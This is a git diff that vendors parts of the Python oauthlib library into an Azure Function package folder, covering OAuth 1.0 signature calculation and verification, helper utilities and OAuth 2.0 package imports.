+    The rules for calculating the *signature base string* are defined in
+    `section 3.4.1.1`_ of RFC 5849.
+
+    .. _`section 3.4.1.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.1
+    """
+
+    # The signature base string is constructed by concatenating together,
+    # in order, the following HTTP request elements:
+
+    # 1. The HTTP request method in uppercase. For example: "HEAD",
+    #    "GET", "POST", etc. If the request uses a custom HTTP method, it
+    #    MUST be encoded (`Section 3.6`_).
+    #
+    # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6
+    base_string = utils.escape(http_method.upper())
+
+    # 2. 
An "&" character (ASCII code 38). + base_string += '&' + + # 3. The base string URI from `Section 3.4.1.2`_, after being encoded + # (`Section 3.6`_). + # + # .. _`Section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + base_string += utils.escape(base_str_uri) + + # 4. An "&" character (ASCII code 38). + base_string += '&' + + # 5. The request parameters as normalized in `Section 3.4.1.3.2`_, after + # being encoded (`Section 3.6`). + # + # .. _`Sec 3.4.1.3.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.2 + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + base_string += utils.escape(normalized_encoded_request_parameters) + + return base_string + + +def base_string_uri(uri: str, host: str = None) -> str: + """ + Calculates the _base string URI_. + + The *base string URI* is one of the components that make up the + *signature base string*. + + The ``host`` is optional. If provided, it is used to override any host and + port values in the ``uri``. The value for ``host`` is usually extracted from + the "Host" request header from the HTTP request. Its value may be just the + hostname, or the hostname followed by a colon and a TCP/IP port number + (hostname:port). If a value for the``host`` is provided but it does not + contain a port number, the default port number is used (i.e. if the ``uri`` + contained a port number, it will be discarded). + + The rules for calculating the *base string URI* are defined in + section 3.4.1.2`_ of RFC 5849. + + .. _`section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + + :param uri: URI + :param host: hostname with optional port number, separated by a colon + :return: base string URI + """ + + if not isinstance(uri, str): + raise ValueError('uri must be a string.') + + # FIXME: urlparse does not support unicode + scheme, netloc, path, params, query, fragment = urlparse.urlparse(uri) + + # The scheme, authority, and path of the request resource URI `RFC3986` + # are included by constructing an "http" or "https" URI representing + # the request resource (without the query or fragment) as follows: + # + # .. _`RFC3986`: https://tools.ietf.org/html/rfc3986 + + if not scheme: + raise ValueError('missing scheme') + + # Per `RFC 2616 section 5.1.2`_: + # + # Note that the absolute path cannot be empty; if none is present in + # the original URI, it MUST be given as "/" (the server root). + # + # .. _`RFC 2616 5.1.2`: https://tools.ietf.org/html/rfc2616#section-5.1.2 + if not path: + path = '/' + + # 1. The scheme and host MUST be in lowercase. + scheme = scheme.lower() + netloc = netloc.lower() + # Note: if ``host`` is used, it will be converted to lowercase below + + # 2. The host and port values MUST match the content of the HTTP + # request "Host" header field. + if host is not None: + netloc = host.lower() # override value in uri with provided host + + # 3. The port MUST be included if it is not the default port for the + # scheme, and MUST be excluded if it is the default. Specifically, + # the port MUST be excluded when making an HTTP request `RFC2616`_ + # to port 80 or when making an HTTPS request `RFC2818`_ to port 443. + # All other non-default port numbers MUST be included. + # + # .. _`RFC2616`: https://tools.ietf.org/html/rfc2616 + # .. 
_`RFC2818`: https://tools.ietf.org/html/rfc2818 + + if ':' in netloc: + # Contains a colon ":", so try to parse as "host:port" + + hostname, port_str = netloc.split(':', 1) + + if len(hostname) == 0: + raise ValueError('missing host') # error: netloc was ":port" or ":" + + if len(port_str) == 0: + netloc = hostname # was "host:", so just use the host part + else: + try: + port_num = int(port_str) # try to parse into an integer number + except ValueError: + raise ValueError('port is not an integer') + + if port_num <= 0 or 65535 < port_num: + raise ValueError('port out of range') # 16-bit unsigned ints + if (scheme, port_num) in (('http', 80), ('https', 443)): + netloc = hostname # default port for scheme: exclude port num + else: + netloc = hostname + ':' + str(port_num) # use hostname:port + else: + # Does not contain a colon, so entire value must be the hostname + + if len(netloc) == 0: + raise ValueError('missing host') # error: netloc was empty string + + v = urlparse.urlunparse((scheme, netloc, path, params, '', '')) + + # RFC 5849 does not specify which characters are encoded in the + # "base string URI", nor how they are encoded - which is very bad, since + # the signatures won't match if there are any differences. Fortunately, + # most URIs only use characters that are clearly not encoded (e.g. digits + # and A-Z, a-z), so have avoided any differences between implementations. + # + # The example from its section 3.4.1.2 illustrates that spaces in + # the path are percent encoded. But it provides no guidance as to what other + # characters (if any) must be encoded (nor how); nor if characters in the + # other components are to be encoded or not. + # + # This implementation **assumes** that **only** the space is percent-encoded + # and it is done to the entire value (not just to spaces in the path). + # + # This code may need to be changed if it is discovered that other characters + # are expected to be encoded. + # + # Note: the "base string URI" returned by this function will be encoded + # again before being concatenated into the "signature base string". So any + # spaces in the URI will actually appear in the "signature base string" + # as "%2520" (the "%20" further encoded according to section 3.6). + + return v.replace(' ', '%20') + + +def collect_parameters(uri_query='', body=None, headers=None, + exclude_oauth_signature=True, with_realm=False): + """ + Gather the request parameters from all the parameter sources. + + This function is used to extract all the parameters, which are then passed + to ``normalize_parameters`` to produce one of the components that make up + the *signature base string*. + + Parameters starting with `oauth_` will be unescaped. + + Body parameters must be supplied as a dict, a list of 2-tuples, or a + form encoded query string. + + Headers must be supplied as a dict. + + The rules where the parameters must be sourced from are defined in + `section 3.4.1.3.1`_ of RFC 5849. + + .. _`Sec 3.4.1.3.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.1 + """ + if body is None: + body = [] + headers = headers or {} + params = [] + + # The parameters from the following sources are collected into a single + # list of name/value pairs: + + # * The query component of the HTTP request URI as defined by + # `RFC3986, Section 3.4`_. 
The query component is parsed into a list + # of name/value pairs by treating it as an + # "application/x-www-form-urlencoded" string, separating the names + # and values and decoding them as defined by W3C.REC-html40-19980424 + # `W3C-HTML-4.0`_, Section 17.13.4. + # + # .. _`RFC3986, Sec 3.4`: https://tools.ietf.org/html/rfc3986#section-3.4 + # .. _`W3C-HTML-4.0`: https://www.w3.org/TR/1998/REC-html40-19980424/ + if uri_query: + params.extend(urldecode(uri_query)) + + # * The OAuth HTTP "Authorization" header field (`Section 3.5.1`_) if + # present. The header's content is parsed into a list of name/value + # pairs excluding the "realm" parameter if present. The parameter + # values are decoded as defined by `Section 3.5.1`_. + # + # .. _`Section 3.5.1`: https://tools.ietf.org/html/rfc5849#section-3.5.1 + if headers: + headers_lower = {k.lower(): v for k, v in headers.items()} + authorization_header = headers_lower.get('authorization') + if authorization_header is not None: + params.extend([i for i in utils.parse_authorization_header( + authorization_header) if with_realm or i[0] != 'realm']) + + # * The HTTP request entity-body, but only if all of the following + # conditions are met: + # * The entity-body is single-part. + # + # * The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # W3C.REC-html40-19980424 `W3C-HTML-4.0`_. + + # * The HTTP request entity-header includes the "Content-Type" + # header field set to "application/x-www-form-urlencoded". + # + # .. _`W3C-HTML-4.0`: https://www.w3.org/TR/1998/REC-html40-19980424/ + + # TODO: enforce header param inclusion conditions + bodyparams = extract_params(body) or [] + params.extend(bodyparams) + + # ensure all oauth params are unescaped + unescaped_params = [] + for k, v in params: + if k.startswith('oauth_'): + v = utils.unescape(v) + unescaped_params.append((k, v)) + + # The "oauth_signature" parameter MUST be excluded from the signature + # base string if present. + if exclude_oauth_signature: + unescaped_params = list(filter(lambda i: i[0] != 'oauth_signature', + unescaped_params)) + + return unescaped_params + + +def normalize_parameters(params) -> str: + """ + Calculate the normalized request parameters. + + The *normalized request parameters* is one of the components that make up + the *signature base string*. + + The rules for parameter normalization are defined in `section 3.4.1.3.2`_ of + RFC 5849. + + .. _`Sec 3.4.1.3.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.2 + """ + + # The parameters collected in `Section 3.4.1.3`_ are normalized into a + # single string as follows: + # + # .. _`Section 3.4.1.3`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3 + + # 1. First, the name and value of each parameter are encoded + # (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key_values = [(utils.escape(k), utils.escape(v)) for k, v in params] + + # 2. The parameters are sorted by name, using ascending byte value + # ordering. If two or more parameters share the same name, they + # are sorted by their value. + key_values.sort() + + # 3. The name of each parameter is concatenated to its corresponding + # value using an "=" character (ASCII code 61) as a separator, even + # if the value is empty. + parameter_parts = ['{}={}'.format(k, v) for k, v in key_values] + + # 4. 
The sorted name/value pairs are concatenated together into a + # single string by using an "&" character (ASCII code 38) as + # separator. + return '&'.join(parameter_parts) + + +# ==== Common functions for HMAC-based signature methods ========= + +def _sign_hmac(hash_algorithm_name: str, + sig_base_str: str, + client_secret: str, + resource_owner_secret: str): + """ + **HMAC-SHA256** + + The "HMAC-SHA256" signature method uses the HMAC-SHA256 signature + algorithm as defined in `RFC4634`_:: + + digest = HMAC-SHA256 (key, text) + + Per `section 3.4.2`_ of the spec. + + .. _`RFC4634`: https://tools.ietf.org/html/rfc4634 + .. _`section 3.4.2`: https://tools.ietf.org/html/rfc5849#section-3.4.2 + """ + + # The HMAC-SHA256 function variables are used in following way: + + # text is set to the value of the signature base string from + # `Section 3.4.1.1`_. + # + # .. _`Section 3.4.1.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.1 + text = sig_base_str + + # key is set to the concatenated values of: + # 1. The client shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key = utils.escape(client_secret or '') + + # 2. An "&" character (ASCII code 38), which MUST be included + # even when either secret is empty. + key += '&' + + # 3. The token shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key += utils.escape(resource_owner_secret or '') + + # Get the hashing algorithm to use + + m = { + 'SHA-1': hashlib.sha1, + 'SHA-256': hashlib.sha256, + 'SHA-512': hashlib.sha512, + } + hash_alg = m[hash_algorithm_name] + + # Calculate the signature + + # FIXME: HMAC does not support unicode! + key_utf8 = key.encode('utf-8') + text_utf8 = text.encode('utf-8') + signature = hmac.new(key_utf8, text_utf8, hash_alg) + + # digest is used to set the value of the "oauth_signature" protocol + # parameter, after the result octet string is base64-encoded + # per `RFC2045, Section 6.8`. + # + # .. _`RFC2045, Sec 6.8`: https://tools.ietf.org/html/rfc2045#section-6.8 + return binascii.b2a_base64(signature.digest())[:-1].decode('utf-8') + + +def _verify_hmac(hash_algorithm_name: str, + request, + client_secret=None, + resource_owner_secret=None): + """Verify a HMAC-SHA1 signature. + + Per `section 3.4`_ of the spec. + + .. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 + + To satisfy `RFC2616 section 5.2`_ item 1, the request argument's uri + attribute MUST be an absolute URI whose netloc part identifies the + origin server or gateway on which the resource resides. Any Host + item of the request argument's headers dict attribute will be + ignored. + + .. 
_`RFC2616 section 5.2`: https://tools.ietf.org/html/rfc2616#section-5.2
+
+    """
+    norm_params = normalize_parameters(request.params)
+    bs_uri = base_string_uri(request.uri)
+    sig_base_str = signature_base_string(request.http_method, bs_uri,
+                                         norm_params)
+    signature = _sign_hmac(hash_algorithm_name, sig_base_str,
+                           client_secret, resource_owner_secret)
+    match = safe_string_equals(signature, request.signature)
+    if not match:
+        log.debug('Verify HMAC failed: signature base string: %s', sig_base_str)
+    return match
+
+
+# ==== HMAC-SHA1 =================================================
+
+def sign_hmac_sha1_with_client(sig_base_str, client):
+    return _sign_hmac('SHA-1', sig_base_str,
+                      client.client_secret, client.resource_owner_secret)
+
+
+def verify_hmac_sha1(request, client_secret=None, resource_owner_secret=None):
+    return _verify_hmac('SHA-1', request, client_secret, resource_owner_secret)
+
+
+def sign_hmac_sha1(base_string, client_secret, resource_owner_secret):
+    """
+    Deprecated function for calculating a HMAC-SHA1 signature.
+
+    This function has been replaced by invoking ``_sign_hmac`` with "SHA-1"
+    as the hash algorithm name.
+
+    This function was invoked by sign_hmac_sha1_with_client and
+    test_signatures.py, but does any application invoke it directly? If not,
+    it can be removed.
+    """
+    warnings.warn('use sign_hmac_sha1_with_client instead of sign_hmac_sha1',
+                  DeprecationWarning)
+
+    # For some unknown reason, the original implementation assumed base_string
+    # could either be bytes or str. The signature base string calculating
+    # function always returned a str, so the new ``_sign_hmac`` only expects
+    # that.
+
+    base_string = base_string.decode('ascii') \
+        if isinstance(base_string, bytes) else base_string
+
+    return _sign_hmac('SHA-1', base_string,
+                      client_secret, resource_owner_secret)
+
+
+# ==== HMAC-SHA256 ===============================================
+
+def sign_hmac_sha256_with_client(sig_base_str, client):
+    return _sign_hmac('SHA-256', sig_base_str,
+                      client.client_secret, client.resource_owner_secret)
+
+
+def verify_hmac_sha256(request, client_secret=None, resource_owner_secret=None):
+    return _verify_hmac('SHA-256', request,
+                        client_secret, resource_owner_secret)
+
+
+def sign_hmac_sha256(base_string, client_secret, resource_owner_secret):
+    """
+    Deprecated function for calculating a HMAC-SHA256 signature.
+
+    This function has been replaced by invoking ``_sign_hmac`` with "SHA-256"
+    as the hash algorithm name.
+
+    This function was invoked by sign_hmac_sha256_with_client and
+    test_signatures.py, but does any application invoke it directly? If not,
+    it can be removed.
+    """
+    warnings.warn(
+        'use sign_hmac_sha256_with_client instead of sign_hmac_sha256',
+        DeprecationWarning)
+
+    # For some unknown reason, the original implementation assumed base_string
+    # could either be bytes or str. The signature base string calculating
+    # function always returned a str, so the new ``_sign_hmac`` only expects
+    # that.
+ + base_string = base_string.decode('ascii') \ + if isinstance(base_string, bytes) else base_string + + return _sign_hmac('SHA-256', base_string, + client_secret, resource_owner_secret) + + +# ==== HMAC-SHA512 =============================================== + +def sign_hmac_sha512_with_client(sig_base_str: str, + client): + return _sign_hmac('SHA-512', sig_base_str, + client.client_secret, client.resource_owner_secret) + + +def verify_hmac_sha512(request, + client_secret: str = None, + resource_owner_secret: str = None): + return _verify_hmac('SHA-512', request, + client_secret, resource_owner_secret) + + +# ==== Common functions for RSA-based signature methods ========== + +_jwt_rsa = {} # cache of RSA-hash implementations from PyJWT jwt.algorithms + + +def _get_jwt_rsa_algorithm(hash_algorithm_name: str): + """ + Obtains an RSAAlgorithm object that implements RSA with the hash algorithm. + + This method maintains the ``_jwt_rsa`` cache. + + Returns a jwt.algorithm.RSAAlgorithm. + """ + if hash_algorithm_name in _jwt_rsa: + # Found in cache: return it + return _jwt_rsa[hash_algorithm_name] + else: + # Not in cache: instantiate a new RSAAlgorithm + + # PyJWT has some nice pycrypto/cryptography abstractions + import jwt.algorithms as jwt_algorithms + m = { + 'SHA-1': jwt_algorithms.hashes.SHA1, + 'SHA-256': jwt_algorithms.hashes.SHA256, + 'SHA-512': jwt_algorithms.hashes.SHA512, + } + v = jwt_algorithms.RSAAlgorithm(m[hash_algorithm_name]) + + _jwt_rsa[hash_algorithm_name] = v # populate cache + + return v + + +def _prepare_key_plus(alg, keystr): + """ + Prepare a PEM encoded key (public or private), by invoking the `prepare_key` + method on alg with the keystr. + + The keystr should be a string or bytes. If the keystr is bytes, it is + decoded as UTF-8 before being passed to prepare_key. Otherwise, it + is passed directly. + """ + if isinstance(keystr, bytes): + keystr = keystr.decode('utf-8') + return alg.prepare_key(keystr) + + +def _sign_rsa(hash_algorithm_name: str, + sig_base_str: str, + rsa_private_key: str): + """ + Calculate the signature for an RSA-based signature method. + + The ``alg`` is used to calculate the digest over the signature base string. + For the "RSA_SHA1" signature method, the alg must be SHA-1. While OAuth 1.0a + only defines the RSA-SHA1 signature method, this function can be used for + other non-standard signature methods that only differ from RSA-SHA1 by the + digest algorithm. + + Signing for the RSA-SHA1 signature method is defined in + `section 3.4.3`_ of RFC 5849. + + The RSASSA-PKCS1-v1_5 signature algorithm used defined by + `RFC3447, Section 8.2`_ (also known as PKCS#1), with the `alg` as the + hash function for EMSA-PKCS1-v1_5. To + use this method, the client MUST have established client credentials + with the server that included its RSA public key (in a manner that is + beyond the scope of this specification). + + .. _`section 3.4.3`: https://tools.ietf.org/html/rfc5849#section-3.4.3 + .. _`RFC3447, Section 8.2`: https://tools.ietf.org/html/rfc3447#section-8.2 + """ + + # Get the implementation of RSA-hash + + alg = _get_jwt_rsa_algorithm(hash_algorithm_name) + + # Check private key + + if not rsa_private_key: + raise ValueError('rsa_private_key required for RSA with ' + + alg.hash_alg.name + ' signature method') + + # Convert the "signature base string" into a sequence of bytes (M) + # + # The signature base string, by definition, only contain printable US-ASCII + # characters. So encoding it as 'ascii' will always work. 
It will raise a
+    # ``UnicodeError`` if it can't encode the value, which will never happen
+    # if the signature base string was created correctly. Therefore, using
+    # 'ascii' encoding provides an extra level of error checking.
+
+    m = sig_base_str.encode('ascii')
+
+    # Perform signing: S = RSASSA-PKCS1-V1_5-SIGN (K, M)
+
+    key = _prepare_key_plus(alg, rsa_private_key)
+    s = alg.sign(m, key)
+
+    # base64-encoded per RFC2045 section 6.8.
+    #
+    # 1. While b2a_base64 implements base64 defined by RFC 3548. As used here,
+    #    it is the same as base64 defined by RFC 2045.
+    # 2. b2a_base64 includes a "\n" at the end of its result ([:-1] removes it)
+    # 3. b2a_base64 produces a binary string. Use decode to produce a str.
+    #    It should contain only printable US-ASCII characters.
+
+    return binascii.b2a_base64(s)[:-1].decode('ascii')
+
+
+def _verify_rsa(hash_algorithm_name: str,
+                request,
+                rsa_public_key: str):
+    """
+    Verify a base64 encoded signature for an RSA-based signature method.
+
+    The ``alg`` is used to calculate the digest over the signature base string.
+    For the "RSA_SHA1" signature method, the alg must be SHA-1. While OAuth 1.0a
+    only defines the RSA-SHA1 signature method, this function can be used for
+    other non-standard signature methods that only differ from RSA-SHA1 by the
+    digest algorithm.
+
+    Verification for the RSA-SHA1 signature method is defined in
+    `section 3.4.3`_ of RFC 5849.
+
+    .. _`section 3.4.3`: https://tools.ietf.org/html/rfc5849#section-3.4.3
+
+    To satisfy `RFC2616 section 5.2`_ item 1, the request argument's uri
+    attribute MUST be an absolute URI whose netloc part identifies the
+    origin server or gateway on which the resource resides. Any Host
+    item of the request argument's headers dict attribute will be
+    ignored.
+
+    .. _`RFC2616 section 5.2`: https://tools.ietf.org/html/rfc2616#section-5.2
+    """
+
+    try:
+        # Calculate the *signature base string* of the actual received request
+
+        norm_params = normalize_parameters(request.params)
+        bs_uri = base_string_uri(request.uri)
+        sig_base_str = signature_base_string(
+            request.http_method, bs_uri, norm_params)
+
+        # Obtain the signature that was received in the request
+
+        sig = binascii.a2b_base64(request.signature.encode('ascii'))
+
+        # Get the implementation of RSA-with-hash algorithm to use
+
+        alg = _get_jwt_rsa_algorithm(hash_algorithm_name)
+
+        # Verify the received signature was produced by the private key
+        # corresponding to the `rsa_public_key`, signing exact same
+        # *signature base string*.
+        #
+        #    RSASSA-PKCS1-V1_5-VERIFY ((n, e), M, S)
+
+        key = _prepare_key_plus(alg, rsa_public_key)
+
+        # The signature base string contains only printable US-ASCII
+        # characters. The ``encode`` method with the default "strict" error
+        # handling will raise a ``UnicodeError`` if it can't encode the value.
+        # So using "ascii" will always work.
+
+        verify_ok = alg.verify(sig_base_str.encode('ascii'), key, sig)
+
+        if not verify_ok:
+            log.debug('Verify failed: RSA with %s: signature base string=%s',
+                      alg.hash_alg.name, sig_base_str)
+        return verify_ok
+
+    except UnicodeError:
+        # A properly encoded signature will only contain printable US-ASCII
+        # characters. The ``encode`` method with the default "strict" error
+        # handling will raise a ``UnicodeError`` if it can't decode the value.
+        # So using "ascii" will work with all valid signatures. But an
+        # incorrectly or maliciously produced signature could contain other
+        # bytes.
+ # + # This implementation treats that situation as equivalent to the + # signature verification having failed. + # + # Note: simply changing the encode to use 'utf-8' will not remove this + # case, since an incorrect or malicious request can contain bytes which + # are invalid as UTF-8. + return False + + +# ==== RSA-SHA1 ================================================== + +def sign_rsa_sha1_with_client(sig_base_str, client): + # For some reason, this function originally accepts both str and bytes. + # This behaviour is preserved here. But won't be done for the newer + # sign_rsa_sha256_with_client and sign_rsa_sha512_with_client functions, + # which will only accept strings. The function to calculate a + # "signature base string" always produces a string, so it is not clear + # why support for bytes would ever be needed. + sig_base_str = sig_base_str.decode('ascii')\ + if isinstance(sig_base_str, bytes) else sig_base_str + + return _sign_rsa('SHA-1', sig_base_str, client.rsa_key) + + +def verify_rsa_sha1(request, rsa_public_key: str): + return _verify_rsa('SHA-1', request, rsa_public_key) + + +def sign_rsa_sha1(base_string, rsa_private_key): + """ + Deprecated function for calculating a RSA-SHA1 signature. + + This function has been replaced by invoking ``sign_rsa`` with "SHA-1" + as the hash algorithm name. + + This function was invoked by sign_rsa_sha1_with_client and + test_signatures.py, but does any application invoke it directly? If not, + it can be removed. + """ + warnings.warn('use _sign_rsa("SHA-1", ...) instead of sign_rsa_sha1', + DeprecationWarning) + + if isinstance(base_string, bytes): + base_string = base_string.decode('ascii') + + return _sign_rsa('SHA-1', base_string, rsa_private_key) + + +# ==== RSA-SHA256 ================================================ + +def sign_rsa_sha256_with_client(sig_base_str: str, client): + return _sign_rsa('SHA-256', sig_base_str, client.rsa_key) + + +def verify_rsa_sha256(request, rsa_public_key: str): + return _verify_rsa('SHA-256', request, rsa_public_key) + + +# ==== RSA-SHA512 ================================================ + +def sign_rsa_sha512_with_client(sig_base_str: str, client): + return _sign_rsa('SHA-512', sig_base_str, client.rsa_key) + + +def verify_rsa_sha512(request, rsa_public_key: str): + return _verify_rsa('SHA-512', request, rsa_public_key) + + +# ==== PLAINTEXT ================================================= + +def sign_plaintext_with_client(_signature_base_string, client): + # _signature_base_string is not used because the signature with PLAINTEXT + # is just the secret: it isn't a real signature. + return sign_plaintext(client.client_secret, client.resource_owner_secret) + + +def sign_plaintext(client_secret, resource_owner_secret): + """Sign a request using plaintext. + + Per `section 3.4.4`_ of the spec. + + The "PLAINTEXT" method does not employ a signature algorithm. It + MUST be used with a transport-layer mechanism such as TLS or SSL (or + sent over a secure channel with equivalent protections). It does not + utilize the signature base string or the "oauth_timestamp" and + "oauth_nonce" parameters. + + .. _`section 3.4.4`: https://tools.ietf.org/html/rfc5849#section-3.4.4 + + """ + + # The "oauth_signature" protocol parameter is set to the concatenated + # value of: + + # 1. The client shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + signature = utils.escape(client_secret or '') + + # 2. 
An "&" character (ASCII code 38), which MUST be included even + # when either secret is empty. + signature += '&' + + # 3. The token shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + signature += utils.escape(resource_owner_secret or '') + + return signature + + +def verify_plaintext(request, client_secret=None, resource_owner_secret=None): + """Verify a PLAINTEXT signature. + + Per `section 3.4`_ of the spec. + + .. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 + """ + signature = sign_plaintext(client_secret, resource_owner_secret) + match = safe_string_equals(signature, request.signature) + if not match: + log.debug('Verify PLAINTEXT failed') + return match diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py new file mode 100644 index 0000000..4a382d8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py @@ -0,0 +1,83 @@ +""" +oauthlib.utils +~~~~~~~~~~~~~~ + +This module contains utility methods used by various parts of the OAuth +spec. +""" +import urllib.request as urllib2 + +from oauthlib.common import quote, unquote + +UNICODE_ASCII_CHARACTER_SET = ('abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789') + + +def filter_params(target): + """Decorator which filters params to remove non-oauth_* parameters + + Assumes the decorated method takes a params dict or list of tuples as its + first argument. + """ + def wrapper(params, *args, **kwargs): + params = filter_oauth_params(params) + return target(params, *args, **kwargs) + + wrapper.__doc__ = target.__doc__ + return wrapper + + +def filter_oauth_params(params): + """Removes all non oauth parameters from a dict or a list of params.""" + is_oauth = lambda kv: kv[0].startswith("oauth_") + if isinstance(params, dict): + return list(filter(is_oauth, list(params.items()))) + else: + return list(filter(is_oauth, params)) + + +def escape(u): + """Escape a unicode string in an OAuth-compatible fashion. + + Per `section 3.6`_ of the spec. + + .. _`section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + + """ + if not isinstance(u, str): + raise ValueError('Only unicode objects are escapable. ' + + 'Got {!r} of type {}.'.format(u, type(u))) + # Letters, digits, and the characters '_.-' are already treated as safe + # by urllib.quote(). We need to add '~' to fully support rfc5849. 
+ return quote(u, safe=b'~') + + +def unescape(u): + if not isinstance(u, str): + raise ValueError('Only unicode objects are unescapable.') + return unquote(u) + + +def parse_keqv_list(l): + """A unicode-safe version of urllib2.parse_keqv_list""" + # With Python 2.6, parse_http_list handles unicode fine + return urllib2.parse_keqv_list(l) + + +def parse_http_list(u): + """A unicode-safe version of urllib2.parse_http_list""" + # With Python 2.6, parse_http_list handles unicode fine + return urllib2.parse_http_list(u) + + +def parse_authorization_header(authorization_header): + """Parse an OAuth authorization header into a list of 2-tuples""" + auth_scheme = 'OAuth '.lower() + if authorization_header[:len(auth_scheme)].lower().startswith(auth_scheme): + items = parse_http_list(authorization_header[len(auth_scheme):]) + try: + return list(parse_keqv_list(items).items()) + except (IndexError, ValueError): + pass + raise ValueError('Malformed authorization header') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py new file mode 100644 index 0000000..f880c02 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py @@ -0,0 +1,36 @@ +""" +oauthlib.oauth2 +~~~~~~~~~~~~~~ + +This module is a wrapper for the most recent implementation of OAuth 2.0 Client +and Server classes. +""" +from .rfc6749.clients import ( + BackendApplicationClient, Client, LegacyApplicationClient, + MobileApplicationClient, ServiceApplicationClient, WebApplicationClient, +) +from .rfc6749.endpoints import ( + AuthorizationEndpoint, BackendApplicationServer, IntrospectEndpoint, + LegacyApplicationServer, MetadataEndpoint, MobileApplicationServer, + ResourceEndpoint, RevocationEndpoint, Server, TokenEndpoint, + WebApplicationServer, +) +from .rfc6749.errors import ( + AccessDeniedError, FatalClientError, InsecureTransportError, + InvalidClientError, InvalidClientIdError, InvalidGrantError, + InvalidRedirectURIError, InvalidRequestError, InvalidRequestFatalError, + InvalidScopeError, MismatchingRedirectURIError, MismatchingStateError, + MissingClientIdError, MissingCodeError, MissingRedirectURIError, + MissingResponseTypeError, MissingTokenError, MissingTokenTypeError, + OAuth2Error, ServerError, TemporarilyUnavailableError, TokenExpiredError, + UnauthorizedClientError, UnsupportedGrantTypeError, + UnsupportedResponseTypeError, UnsupportedTokenTypeError, +) +from .rfc6749.grant_types import ( + AuthorizationCodeGrant, ClientCredentialsGrant, ImplicitGrant, + RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant, +) +from .rfc6749.request_validator import RequestValidator +from .rfc6749.tokens import BearerToken, OAuth2Token +from .rfc6749.utils import is_secure_transport +from .rfc8628.clients import DeviceClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..73476c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py new file mode 100644 index 0000000..8a251ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py @@ -0,0 +1,16 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import functools +import logging + +from .endpoints.base import BaseEndpoint, catch_errors_and_unavailability +from .errors import ( + FatalClientError, OAuth2Error, ServerError, TemporarilyUnavailableError, +) + +log = logging.getLogger(__name__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..27b923b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..e33ee19 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc new file mode 100644 index 0000000..f4a340e Binary files /dev/null 